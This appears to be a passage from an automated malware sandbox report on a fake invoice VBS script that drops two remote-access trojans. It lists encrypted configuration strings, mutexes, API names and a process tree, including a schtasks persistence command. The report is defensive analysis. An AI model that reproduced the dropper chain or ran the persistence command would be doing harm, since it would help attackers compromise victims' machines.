'guaOpPvLUuTY1lGiMRcMdLKZx2lI+Z0hP1IEWzhfwOExZiFB7mJpRsbJNVbckUa6w/E7gsxM7nJ91FblGT+06XKUW1Zt8fn+EmcpaLTPFOHa71dd/dkgw4iKFll6uK0fEpjZKhw90nAvt7q7xo/Sn8kNd6Q0qObHLuFuVK8soCYl5X0s4Khla/FB4I+wTl53FnTbGqpBLjW3Fo28IFGoCdJxJ94Mom2WT2996GM3npHKsbmwtpDdlNfeiVucvSjXrwHp1p+vLXcyA+66jp0v5DBxnmiMHDZPPTLX81sNEZkQgdEAKfTn0Y0edIG6aaHTeEPdAkVioYo
            Source: 3.0.ame.exe.500000.0.unpack, Client/Settings.csBase64 encoded string: 'zRlbkDV/H4IQoBSWA+od+Fo7vFBH6XGjYAE8lUUM1EgdgQ/dxZntjT1mcc5I8leIvIPIn+elqTA+hEinIzR/IA==', '/VvVX34V9tWm+vKyVZ9H+jroY9Sy/aAHhfTNJjSdeNrF3Fgc5YawIQW6zbZ5ubwiFr/xRkrp76tOkFGjHJZKOL2fo7aWPeRn4i7nueeakB8=', 'OrWq9hO36kOLoaNhl6j14kwqg/h20q8S7Yayyw9+JcoIZqzmQ6M3PdcQj7JMXoRgpsRUgE8UjS2jWrhKEZhCHErXU0RvwYoxBJMYsT7cQmY=', 'WBGHNRi8L9JUTsQXfJ0C9IC0E04SXD4/4X6vUBhmMQAo1WSxLrnQtYGHkd2IQunJ3KwIyQ4BGYEgtxMleHH4Esv6MX7v/JR54tfIV5lp6MJcJz4sT35rzz9DF3l1e22CLGS+ySIgX/lvgYQ3h2lTuaTJ1YuKFrxRZuH97cBTT7SMaL0PgJAfIfO42il12S7Cuo2mBdPjGyyQf8A8IWCJIW/J3tcwr8vHj6LtYjQ5qWayZj3KLPwtE0hJLGqSJqkP5ZaHJSFv0T2Tz0gIVCFZu+mgM4MvjdzSwFFohSYH/naQDzoUvcBsq4+v4EPoWVtUipI+B931z/+ilZR+LkxsT5Swmkfg3wYkC0lpHWoynkWLlV4XYYj5awWjaPCGkX92lu4/Z5enuGvQvQ8YZV2GKRLyhuR058QPw+cMPW2UIRYKFMz+Marm9/DobQ90eiXgaqJqcrAjyqgoijt8nKIY7ZIdmuozSeQDm0Jf5x6vE7zrGwXEi0luLrnlam3SQuo+gsi9pvB7hl4u+Zg3tBqCxOpGCtWShGbh3VSZSTVIYxn2gjzqnL+3dtW8B4iEOQJBXVd6tEKmDAVuotMCUA25sUE0qUHjFMMrVyh/W4ZJiXAiKVhnfGqoaqCZZjHHt1H3O8LD+NBuhuWFboc0t+4awY4Ve8BTG/5ZpzEwtLisZk1VWDq2jB0jeaPIs606P2/3+f86Ha9sqTeU5A6434fKlUTGvLbl68+6NMSOufOSE3YvEK6otNtaqbZAWxHj3DRUekhLNVLhVjQy7JkX9l1nWYKTGxZ56PanX62DStaqmApaDqifK79+HiEJTkIzYo37HFBtB6AgBQDhJ60NVhNJh20nxdKFaQeiHbh4wLwIOHVy2R4veZKCKjXMII4mw011rJ06Jj7Gb1V37HDYt1YSjXD7PPywVXETeerRsjQbPTDPVjI7raB+5UfCRtU+kLt4Oh6KgM6/7qTZKkZu39xpv4fz86QLFEDnDUpiY2tlZEMvPVxuW0CgF59b5wvNcdH6l3uRvMu0og8PdPiJ0KXeP6FUUlPrkttqHwyj4HxstPMjg4vtF9MZbpeq9eAJECXh0mp0nBH7/2MrhaGachvGPRk4Nnw0xbBxI0Xhu31n4nX7or01HcXoxOmOFz3qScR0aBPjufDnc2acw80RRginVe8t0tOsnHewrvje+wE10dfFI6C30365ofjAxysHcrMf/FRrG1rHbNm/Ez46jc4FqUdgxHdfKV9EJzJMGlIN45druJWv4hG4UBfcNORevQxK6PhLiw+tJD3NWV8mCDI3F3n6riz1yLIiUSFm5OZiMdA8tVzffDnu3xh0WzdmFd16unj8p6PBDZPDX6rokijCD0cidrC6cN+3Kvt0ATQszg+vnVA64X/RtPFc2mttuLOj7ZvUAatqx0raPBBXdkN+e/W4Pv+MB8WUUQSlN15JiFZwxtK7Td+Dg3peGH6RCedNFTgUYE5EdM2wyUu535beIOmKEMXEue0gBJpYI0QoA/3hb6ZsRdYilaX6mCWxTeCMjRLAYCppqTdhLie69ZlkN+988/MDGb6w3Z141+c+VCaXMZDnQ/QcILiHk5TXcv8/4mCd5VMeywJHl2u75/M3mSUYy/6GvUbwKrtzlJ38gw7EVBHe7NfK2JfEzvGjZ1dTi3XzKuql5TJHJyl+EmsoX3C2OUQ/o38l3s8t+eYyc4xHmMqXScpMnmZXWN9219miDvN2gh/v1bC0+k3r4+ocPGeuHe3eoAx1CE/weDFSIWza52uKLRS5fDyzcoiKjwJ14bdGbOnbhXEox05RQDSMG0H8htMKm6LBqq992w4DE3bPlrMkVXG/zcRn3BPgTfT/tvnxkbZORuSXct3fnsWKGPzwq1AG+sOu4276wVLpR9VH1aOmmkX0oCpsTGpvqD66+LbCGlLwHp0Oi1MQeeA9WkYBNctlKsrFrMPbmJAP7H5RTUeQ+fXNaOY0G7rwnmSWuCHk99EoowYMekK51IfqeuorZnXYzvphpBneIDOxhSmhPLftvKF0wFzL6hI/yygYxZgiILVWwrqFjduyQMUBiKNiFcxWQGXoS0IZEGwK3DmKa3o3OwgbzTjOf2XoELpDXvV2nSn7EP4Oj4Rohpw+SDqmNrfhdbE+mzmaukdYbZBhwCfSdqaDTxQdEWhpq65hL5dsgFgwUK8kVIqvL2pXkzJpqoFCwR9t8Vkz+UGKV9tFy0Quz5WtKbpzzf61OnKlRauCRCnsRrXH6NqjJiZ6n7V9gqhesNjN+Fcq6ddsfPyUJIXavmslk7OyhkUXn7auG5NJfTy6Y/lX7SNlyGOWVi0SD9Xe/xbrMbQflN9qaCw=', 'guaOpPvLUuTY1lGiMRcMdLKZx2lI+Z0hP1IEWzhfwOExZiFB7mJpRsbJNVbckUa6w/E7gsxM7nJ91FblGT+06XKUW1Zt8fn+EmcpaLTPFOHa71dd/dkgw4iKFll6uK0fEpjZKhw90nAvt7q7xo/Sn8kNd6Q0qObHLuFuVK8soCYl5X0s4Khla/FB4I+wTl53FnTbGqpBLjW3Fo28IFGoCdJxJ94Mom2WT2996GM3npHKsbmwtpDdlNfeiVucvSjXrwHp1p+vLXcyA+66jp0v5DBxnmiMHDZPPTLX81sNEZkQgdEAKfTn0Y0edIG6aaHTeEPdAkVioYo
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Settings.csBase64 encoded string: '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
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Settings.csBase64 encoded string: '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
            Source: dhcpmon.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: dhcpmon.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: ame.exe.1.dr, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: ame.exe.1.dr, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 3.2.ame.exe.500000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 3.2.ame.exe.500000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Notepads.exe.3.dr, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: Notepads.exe.3.dr, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 3.0.ame.exe.500000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 3.0.ame.exe.500000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@14/9@20/3
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_023410DA AdjustTokenPrivileges,
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_023410A3 AdjustTokenPrivileges,
            Source: C:\Users\user\AppData\Local\Temp\fi.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeFile created: C:\Users\user\AppData\Roaming\Notepads.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeMutant created: \Sessions\1\BaseNamedObjects\871-085a33d91457
            Source: C:\Users\user\AppData\Local\Temp\fi.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{ac555290-50d4-4120-9390-e76e4f948dd7}
            Source: C:\Users\user\AppData\Local\Temp\fi.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_01
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeMutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\ame.exeJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice No F1019855_PDF.vbs'
            Source: C:\Users\user\AppData\Local\Temp\ame.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\fi.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\fi.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\AppData\Local\Temp\fi.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\Notepads.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\Notepads.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\AppData\Roaming\Notepads.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Invoice No F1019855_PDF.vbsVirustotal: Detection: 29%
            Source: Invoice No F1019855_PDF.vbsReversingLabs: Detection: 23%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice No F1019855_PDF.vbs'
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\ame.exe 'C:\Users\user\AppData\Local\Temp\ame.exe'
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\fi.exe 'C:\Users\user\AppData\Local\Temp\fi.exe'
            Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs'
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess created: C:\Users\user\AppData\Roaming\Notepads.exe 'C:\Users\user\AppData\Roaming\Notepads.exe'
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe
            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Notepads.exe C:\Users\user\AppData\Roaming\Notepads.exe
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\ame.exe 'C:\Users\user\AppData\Local\Temp\ame.exe'
